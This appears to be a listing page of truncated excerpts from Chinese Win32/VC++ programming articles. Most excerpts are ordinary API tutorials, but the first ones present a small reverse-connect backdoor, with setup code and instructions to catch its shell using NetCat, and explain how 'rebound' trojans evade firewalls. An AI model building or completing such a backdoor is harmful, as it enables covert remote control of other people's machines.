/* 1k(程序体积1kb) 反向连接,零管道后门 By Anskya说明: 不用我多说了吧..黑客一般都会使用的后门程序.. 这里只是简单的演示一下..没有添加进程隐藏功能 程序可以在Win9x,Win2k,WinXP,Win2k3上使用 程序体积只有1k(FSG压缩一下会更小)测试: 本地开启NetCat等工具,监听80端口,会返回一个Shell*/#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")#pragma comment(linker,"/INCREMENT...

#include<winsock2.h>#include<stdio.h>#pragma comment(lib,"ws2_32.lib")void main(int argc,char **argv){char *messages = " ======================== BackConnect BackDoor V0.1 ======================== ========= Welcome to Http://www.hackerxfiles.net ========= "; WSADATA WSAData;SOCKET sock;SOCKADDR_I...

随着安全事件的不断涌现，人们的主机防护意识越来越强，各种各样的防火墙和反病毒软件都开始对来自外部的网络连接进行监控，所以传统的采用正向连接的木马已经不再适应现在的网络环境了。为了能够继续进行远程控制，木马不得不从体制上进行改变，这就出现了采用反向连接技术的“反弹型”木马。“反弹”木马现在已经见得比较多了，但是对其技术细节介绍的文章还是比较少。从本质上来说，反向连接和正向连接的区别并不大。在正向连接的情况下，服务器端也就是被控制端，在编程实现的时候是采用服务器端的编程方法的；而控制端，在编程实现的时候采用的是客户端的编程方法。当我们采用反弹的方法编程的时候，实际上就是将被控制端变成了采...

编辑框(Edit Box)控件实际上是一个简易的正文编辑器，用户可以在编辑框中输入并编辑正文。编辑框既可以是单行的，也可以是多行的，多行编辑框是从零开始编行号的．在一个多行编辑框中，除了最后一行外，每一行的结尾处都有一对回车换行符（用＂\r\n＂表示）．这对回车换行符是正文换行的标志，在屏幕上是不可见的． 编辑框控件会向父窗口发出如表6.5所示的控件通知消息.　 表6.5 消息 含义 EN_CHANGE 编辑框的内容被用户改变了。与EN_UPDATE不同，该消息是在编辑框显示的正文被刷新后才发出的。 EN_ERRSPACE ...

Shell_NotifyIcon 托盘的函数 hwnd 32位的窗口句柄。窗口可以是任何类型的屏幕对象，因为Win32能够维护大多数可视对象的句柄(窗口、对话框、按钮、编辑框等)。　　message 用于区别其他消息的常量值，这些常量可以是Windows单元中预定义的常量，也可以是自定义的常量。　　wParam 通常是一个与消息有关的常量值，也可能是窗口或控件的句柄。　　lParam 通常是一个指向内存中数据的指针。由于W P a r a m、l P a r a m和P o i n t e r都是3 2位的，因此，它们之间可以相互转换。　　WM_NULL = $0000;　　W...

下面的代码演示了如何得到GetOpenFileName允许多选的情况下选择的文件名#include <windows.h> int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd){ OPENFILENAME ofn; TCHAR szOpenFileNames[80*MAX_PATH]; TCHAR szPath[MAX_PATH]; TCHAR szFileName[80*MAX_PATH]; TCHAR* p; int nLen = 0; ZeroM...

在阅读这篇文章之前,你可能要先阅读http://www.codeproject.com/system/inject2exe.asp#PortableExecutablefileformat2 和http://blog.csdn.net/XXKKFF/archive/2007/03/06/1522632.aspx 下面这段代码是一个动态链接库的源码,它用于挂接MessageBoxW的调用 #include <windows.h>#include <ImageHlp.h> //for ImageDirectoryEntryToData#includ...

一、简述 实际上，本文的设计，所使用的只是 Simple MAPI，可以把它看作是MAPI（Messaging Application Programming Interface）的一个子集。不过大多数时候，Simple MAPI提供的功能已经足够使用。本文阐述了一个简单的，用于发送一个带附件的邮件的功能实现。如果需要更复杂的功能，我认为还是老老实实封装SMTP和 POP3比较好 二、Simple MAPI 介绍 Simple MAPI 包括一组很容易使用的函数以及相关的数据结构，可以在C/C++、VB等多种语言中使用。本文是基于VC设计的。 实现一个完整的邮件发送过程，...

陆其明 译 原文：http://www.codeproject.com/cpp/complex_declarations.asp 作者：Vikram A Punathambekar 介绍 曾经碰到过让你迷惑不解、类似于int * (* (*fp1) (int) ) [10];这样的变量声明吗？本文将由易到难，一步一步教会你如何理解这种复杂的C/C++声明：我们将从每天都能碰到的较简单的声明入手，然后逐步加入 const修饰符和typedef，还有函数指针，最后介绍一个能够让你准确地理解任何C/C++声明的“右左法则”。需要强调一下的是，复杂的C/C+ +声明并不是好的编程风格；...

#define WIN32_LEAN_AND_MEAN #include <stdio.h> #include <windows.h> #include <commctrl.h> int main(void) { HWND hwnd=FindWindow(NULL, "Stealing Program's Memory: ListView"); HWND listview=FindWindowEx(hwnd, NULL, "SysListView32", NULL); int count=(int)SendMessage(listview, LVM_GETITEMCOUNT, 0, 0)...

RegisterHotKey()实现Alt+E的快捷键组合功能[问题提出] 有的程序需要自定义组合键完成一定功能,如何实现? [解决方法] RegisterHotKey函数原型及说明： BOOL RegisterHotKey( HWND hWnd, // 接收WM_HOTKEY的窗口句柄 int id, // hot key的ID号. UINT fsModifiers, // 响应那个热键. UINT vk ...

1. 如何激活当前屏幕保护程序// 激活当前屏幕保护程序, jingzhou xuPostMessage(WM_SYSCOMMAND,SC_SCREENSAVE,0);2. 如何禁止/启用屏幕保护及电源管理static UINT dss_GetList[] = {SPI_GETLOWPOWERTIMEOUT, SPI_GETPOWEROFFTIMEOUT, SPI_GETSCREENSAVETIMEOUT};static UINT dss_SetList[] = {SPI_SETLOWPOWERTIMEOUT, SPI_SETPOWEROFFTIMEOUT, SPI_SETSCREENS...

Windows系统是建立在事件驱动的机制上的，说穿了就是整个系统都是通过消息的传递来实现的。而钩子是Windows系统中非常重要的系统接口，用它可以截获并处理送给其他应用程序的消息，来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件消息，截获发往目标窗口的消息并进行处理。这样，我们就可以在系统中安装自定义的钩子，监视系统中特定事件的发生，完成特定的功能，比如截获键盘、鼠标的输入，屏幕取词，日志监视等等。可见，利用钩子可以实现许多特殊而有用的功能。因此，对于高级编程人员来说，掌握钩子的编程方法是很有必要的。钩子的类型　　 一． 按事件分类，有如下的几种常用类型　　 （1）...

1、静态链接使用该方法，必须制定要链接的lib文件。和接口说明的*.h文件 2、动态链接该方法用LoadLibrary载入dll，并且使用GetProcAddress得到dll中允许应用程序调用的函数的地址在最后还要释放该dll：FreeLibrary DllHmodule = LoadLibrary("H:\\MyVC\\your.dll"); if( !DllHmodule ) { AfxMessageBox("调用Dll失败!"); CDialog::OnOK(); } YOURFUNCDEFINE MyFunc = (YOURFUNCDEFINE)GetProcA...

mciSendString是用来播放多媒体文件的API指令，可以播放MPEG,AVI,WAV,MP3,等等，下面我们来介绍一 　　下它的使用方法： 　　一，打开多媒体文件。 　　首先在Dialog上面放一个Picture控件，MCISendString就在这个Picture控件的平面上播放多媒体文件， 　　设Picture控件的ID为IDC_STATIC1： 　　CStatic *pStatic=(CStatic*)GetDlgItem(IDC_STATIC1);HWND h=pStatic->GetSafeHwnd(); 　　CString open1; 　...

1.CObject类为MFC总类，该类下面有一个重要的类CCmdTarget。 而CCmdTarget类下面又有四个重要的继承类，分别为：CWinThread、CDocument、CDocTemplate、 CWnd类。所以，可以得出一个大概继承图，如图所示： CObject--->CCmdTarget ---->CWinThread ---->CWinApp ----->CDocTemplate ...

Win32 API 函数★★★ 2008年12月13日 星期六 23:41 2008/11/26 14:47 1、EnableMenuItem 允许、禁止或变灰指定的菜单条目 2、EnableWindow 允许或禁止鼠标和键盘控制指定窗口和条目（禁止时菜单变灰） CreateDialog 从资源模板建立一非模态对话窗 CreateDialogParam 从资源模板建立一非模态对话窗 CreateDialogIndirect 从内存模板建立一非模态对话窗 ...

WindowsXP的注册表包含了WindowsXP的系统配置、PC机的硬件配置、Win32应用程序和用户的其他设置信息。注册表和INI文件不同，它是多层次的树状数据结构，具有六个分支（根键），每个分支又由许多的键和键值组成，而每个键则代表一个特定的配置项目。　　在实际的编程工作中，我们遇到了如何在Visual C＋＋中对WindowsXP注册表整个树状结构信息进行访问和修改的问题，如查询和修改注册表中用户姓名和公司名称的有关信息。通过编程实践，我们实现了在Visual C＋＋中查询和修改系统注册表的有关信息。下面以一个实例说明具体的编程方法。　　在Visual C＋＋ 6.0或5.0环境...

常用 API 函数(10): 硬件与系统函数 ActivateKeyboardLayout 激活一个新的键盘布局。键盘布局定义了按键在一种物理性键盘上的位置与含义 Beep 用于生成简单的声音 CharToOem 将一个字串从ANSI字符集转换到OEM字符集 ClipCursor 将指针限制到指定区域 ConvertDefaultLocale 将一个特殊的地方标识符转换成真实的地方ID CreateCaret 根据指定的信息创建一个插入符(光标)，并将它选定为指定窗口的默认插入符 DestroyCaret 清除(破坏)一个插...

常用 API 函数(6): 菜单函数 AppendMenu 在指定的菜单里添加一个菜单项 CheckMenuItem 复选或撤消复选指定的菜单条目 CheckMenuRadioItem 指定一个菜单条目被复选成"单选"项目 CreateMenu 创建新菜单 CreatePopupMenu 创建一个空的弹出式菜单 DeleteMenu 删除指定的菜单条目 DestroyMenu 删除指定的菜单 DrawMenuBar 为指定的窗口重画菜单 EnableMenuItem 允许或禁止指定的菜单条目 GetM...